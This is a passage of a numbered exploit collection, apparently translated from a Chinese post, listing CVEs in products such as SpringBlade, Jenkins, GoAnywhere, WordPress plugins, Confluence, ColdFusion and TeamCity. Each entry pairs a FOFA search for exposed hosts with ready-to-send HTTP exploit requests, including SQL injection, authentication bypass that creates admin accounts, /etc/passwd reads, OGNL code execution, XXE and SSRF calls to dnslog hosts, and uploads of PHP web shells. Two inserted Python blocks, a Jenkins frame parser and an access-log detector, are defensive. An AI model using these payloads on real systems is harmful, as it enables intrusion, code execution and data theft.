POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: <replace with your own token>
Connection: close


108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close


109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'


POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0


The download side returns lines of the requested file embedded in the CLI error output:
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
 [COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)
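The upload body above is the Jenkins plain CLI protocol: a sequence of frames, each a 4-byte big-endian payload length, a 1-byte opcode (ARG=0, LOCALE=1, ENCODING=2, START=3) and the payload, where ARG, LOCALE and ENCODING carry a length-prefixed UTF string. The read primitive is args4j expanding an argument that starts with `@` into the contents of the named file, which the `help` command then echoes back in its error text. The following Python is an added example written for this page, not code from Jenkins or from the original post: it rebuilds the body from its parts, parses it back into frames, and flags any `@file` argument, which is the check a proxy or WAF log review would want. Note that the body has to be sent as the 57 raw bytes, not as the escaped Python literal text printed above.

```python
import struct

# Opcodes of the Jenkins plain CLI protocol that occur in the body above
# (ordinals of PlainCLIProtocol.Op in Jenkins core).
OP_ARG, OP_LOCALE, OP_ENCODING, OP_START = 0, 1, 2, 3
OP_NAMES = {OP_ARG: "ARG", OP_LOCALE: "LOCALE", OP_ENCODING: "ENCODING", OP_START: "START"}

# The request body from entry 109, as raw bytes (57 bytes).
PAGE_BODY = (
    b"\x00\x00\x00\x06\x00\x00\x04help"
    b"\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd"
    b"\x00\x00\x00\x05\x02\x00\x03GBK"
    b"\x00\x00\x00\x07\x01\x00\x05en_US"
    b"\x00\x00\x00\x00\x03"
)


def _java_utf(s: str) -> bytes:
    """2-byte big-endian length prefix plus the bytes (Java DataOutput.writeUTF for ASCII)."""
    data = s.encode("utf-8")
    return struct.pack(">H", len(data)) + data


def encode_frame(op: int, payload: bytes = b"") -> bytes:
    """One frame: 4-byte payload length, 1-byte opcode, payload."""
    return struct.pack(">I", len(payload)) + bytes([op]) + payload


def build_cli_body(args, encoding: str = "GBK", locale: str = "en_US") -> bytes:
    """Serialise a CLI invocation in the same frame order the page's body uses."""
    frames = [encode_frame(OP_ARG, _java_utf(a)) for a in args]
    frames.append(encode_frame(OP_ENCODING, _java_utf(encoding)))
    frames.append(encode_frame(OP_LOCALE, _java_utf(locale)))
    frames.append(encode_frame(OP_START))
    return b"".join(frames)


def parse_cli_body(body: bytes):
    """Split a body into (opcode name, string-or-None) tuples, rejecting truncated frames."""
    frames, pos = [], 0
    while pos < len(body):
        if pos + 5 > len(body):
            raise ValueError("truncated frame header at offset %d" % pos)
        (length,) = struct.unpack(">I", body[pos:pos + 4])
        op = body[pos + 4]
        payload = body[pos + 5:pos + 5 + length]
        if len(payload) != length:
            raise ValueError("truncated frame payload at offset %d" % pos)
        pos += 5 + length
        text = None
        if op in (OP_ARG, OP_LOCALE, OP_ENCODING):
            (slen,) = struct.unpack(">H", payload[:2])
            text = payload[2:2 + slen].decode("utf-8")
        frames.append((OP_NAMES.get(op, "OP_%d" % op), text))
    return frames


def file_expansion_args(body: bytes):
    """ARG values beginning with '@': the ones args4j would replace with file contents."""
    return [t for name, t in parse_cli_body(body) if name == "ARG" and t and t.startswith("@")]


if __name__ == "__main__":
    for frame in parse_cli_body(PAGE_BODY):
        print(frame)
    print("file-read arguments:", file_expansion_args(PAGE_BODY))
```

Any ARG frame whose string starts with `@` reaching an unpatched controller is the indicator; on a patched Jenkins the expansion is disabled, but the request shape is still worth alerting on.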


110. GoAnywhere MFT unauthenticated administrator creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml" || icon_hash="1484947000" || icon_hash="1828756398" || icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


111. WordPress plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


112. WordPress plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}


113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close


115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip


Step 2: substitute the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "<value obtained in step 1>",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}


116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--


117. WordPress LayerSlider plugin SQL injection
version: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
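Most of the probes in entries 101 through 117 above leave a trace in an ordinary web server access log because the payload sits in the request line: SLEEP()/updatexml() SQL injection (105, 106, 107, 111, 114, 117), `/../` and `/..;/` path-normalisation bypasses (101, 110), the Jenkins CLI endpoint (109), the OFBiz `requirePasswordChange=Y` bypass (95, 96), the Ivanti SAML endpoints (102, 103) and the wp-automatic download parameter (113). The Python below is an added example written for this page, not code from any of the vendors or from the original post. It parses combined-format log lines, URL-decodes the request target repeatedly so double encoding cannot hide a payload, matches it against signatures distilled from these entries, and runs over constructed sample lines (not real traffic) modelled on entries 101, 106, 109, 110 and 111. Payloads carried in a POST body (NotificationX in 112, the Byzoro uploads, the Jenkins frame itself) need request-body logging or a WAF; an access log alone does not show them.

```python
import re
from urllib.parse import unquote_plus

# Signatures distilled from the request paths and parameters listed on this page.
SIGNATURES = [
    ("time-based SQLi (SLEEP)", re.compile(r"\bsleep\s*\(\s*\d+\s*\)", re.I)),
    ("error-based SQLi (updatexml)", re.compile(r"\bupdatexml\s*\(", re.I)),
    ("path traversal / auth bypass", re.compile(r"/\.\.(?:;)?/")),
    ("Jenkins CLI endpoint", re.compile(r"^/cli\?remoting=false", re.I)),
    ("OFBiz requirePasswordChange bypass", re.compile(r"requirePasswordChange=Y", re.I)),
    ("Ivanti SAML endpoint", re.compile(r"/dana-(?:ws/saml20\.ws|na/auth/saml-sso\.cgi)", re.I)),
    ("wp-automatic download", re.compile(r"wp_automatic=download", re.I)),
]

# Combined/common log format: ip ident user [time] "METHOD target proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>\S+)" (?P<status>\d{3})'
)


def normalize_target(target: str, rounds: int = 3) -> str:
    """URL-decode until stable (bounded), so %2527-style double encoding is seen as a quote."""
    cur = target
    for _ in range(rounds):
        nxt = unquote_plus(cur)
        if nxt == cur:
            break
        cur = nxt
    return cur


def scan_line(line: str):
    """Return a finding dict for one log line, or None if it is unparseable or benign."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = normalize_target(m["target"])
    hits = [name for name, rx in SIGNATURES if rx.search(decoded)]
    if not hits:
        return None
    return {"ip": m["ip"], "ts": m["ts"], "method": m["method"],
            "target": m["target"], "hits": hits}


def scan(lines):
    return [r for r in (scan_line(l) for l in lines) if r]


def hits_by_source(results):
    """Count findings per source address, the first pivot during triage."""
    counts = {}
    for r in results:
        counts[r["ip"]] = counts.get(r["ip"], 0) + 1
    return counts


# Constructed sample log lines (not real traffic), modelled on entries 111, 106, 101, 110, 109
# plus one benign request.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Jan/2024:10:00:01 +0000] "GET /?rest_route=/h5vp/v1/view/1&id=1%27+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Jan/2024:10:00:02 +0000] "GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1" 500 128',
    '198.51.100.9 - - [10/Jan/2024:10:00:03 +0000] "GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20example.invalid HTTP/1.1" 200 64',
    '198.51.100.9 - - [10/Jan/2024:10:00:04 +0000] "GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1" 200 2048',
    '192.0.2.77 - - [10/Jan/2024:10:00:05 +0000] "POST /cli?remoting=false HTTP/1.1" 200 0',
    '192.0.2.10 - - [10/Jan/2024:10:00:06 +0000] "GET /wp-content/themes/bricks/style.css HTTP/1.1" 200 9000',
]


if __name__ == "__main__":
    findings = scan(SAMPLE_LOG)
    for f in findings:
        print(f["ip"], f["method"], f["target"], "->", ", ".join(f["hits"]))
    print(hits_by_source(findings))
```

The traversal signature deliberately includes the `..;/` form, which Tomcat-style servlet containers treat as a path parameter and strip, so a naive `/../` rule would miss the GoAnywhere request. Tune the SLEEP() rule if an application legitimately passes SQL in the query string, which is rare enough that a hit should be investigated by default.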


118. Beijing Baichuo (Byzoro) Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--


Then access /home/src.php

119. Beijing Baichuo (Byzoro) Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in to the system first; the default credentials are admin/admin.
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
Origin: https://x.x.x.x:8443
Referer: https://x.x.x.x:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456


120. Beijing Baichuo (Byzoro) Smart S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328--


File path: /upload/2.php

121. Beijing Baichuo Smart S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328

File path: boot/web/upload/weblogo/1.php

122. Beijing Baichuo Smart S200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
Here sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the SQL statement base64-encoded; decoded it reads sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. Hunan Jianyan engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage:
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

After the user is created, log in to the admin backend directly; system commands can then be executed.

126. Aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. Glodon Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Adobe ColdFusion 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier)
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read the /etc/passwd file
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin backend URL: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 cloud mall file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec NS-ASG application security gateway index.php SQL injection
CVE-2024-2330
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
